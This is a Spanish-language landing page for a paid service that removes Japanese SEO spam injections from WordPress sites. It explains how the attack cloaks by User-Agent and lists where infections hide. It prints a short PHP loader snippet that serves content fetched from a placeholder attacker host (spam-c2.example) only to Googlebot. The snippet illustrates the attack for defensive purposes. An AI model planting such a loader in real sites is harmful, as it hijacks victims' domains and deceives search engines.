Japanese SEO spam · cloaked · cleaned
Japanese SEO spam removal.
Eliminación manual de la inyección de spam SEO japonés. Limpieza de archivos y base de datos. Purga del sitemap. Vector de entrada identificado. Solicitudes de reconsideración enviadas. Tarifa plana $279.
Mechanism
Qué es el 'spam SEO japonés', técnicamente.
Un atacante planta un loader PHP en tu sitio (normalmente en wp-content/plugins/ o wp-content/uploads/). El loader genera miles de páginas sintéticas con keywords japonesas y títulos de producto japoneses. Reescribe tu sitemap para que Googlebot las encuentre. Los visitantes reales nunca ven el spam — el loader comprueba el User-Agent y sirve tu sitio normal a los humanos.
Para cuando te das cuenta, Google ha indexado cientos o miles de URLs en japonés en tu dominio. Search Console envía un aviso de seguridad por email. El posicionamiento cae. La etiqueta 'Hacked: Content injection' aparece en Search Console.
01 <?php 02 // Serve spam only to Googlebot. Real users see the normal site. 03 if (strpos($_SERVER['HTTP_USER_AGENT'], 'Googlebot') !== false) { 04 $payload = file_get_contents('https://spam-c2.example/jp/' . $_SERVER['REQUEST_URI']); 05 echo $payload; 06 exit; 07 }
What I remove
Cada lugar donde se esconde esta infección.
File loaders
PHP ofuscado en plugins, mu-plugins, temas y uploads. Leemos los diffs, no los nombres de archivo.
Database
Contenido spam inyectado en wp_posts, entradas autoloaded maliciosas en wp_options, wp_usermeta sospechoso.
Sitemap
Entradas sintéticas generadas en el sitemap eliminadas; sitemap limpio regenerado y reenviado a Search Console.
Htaccess
Reglas de reescritura en .htaccess y nginx que redirigen Googlebot o rutas concretas — revertidas.
Admin users
Cuentas de administrador durmientes creadas por el loader — eliminadas. Todos los secrets de admin restantes rotados.
Entry vector
Plugin vulnerable o credencial robada identificados y cerrados. Sin este paso, el mismo agujero se reutiliza en semanas.
Precios
Cleanup
$279
flat, one-time, per site
Manual cleanup, entry-vector identification, written forensic report.
Iniciar limpiezaMonitoring
$29 / mo
per site, cancel any time
Monitorización continua, endurecimiento, una limpieza al año incluida.
ProtégetePart of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.
Ver todos los servicios →Correo [email protected] or use the contact form.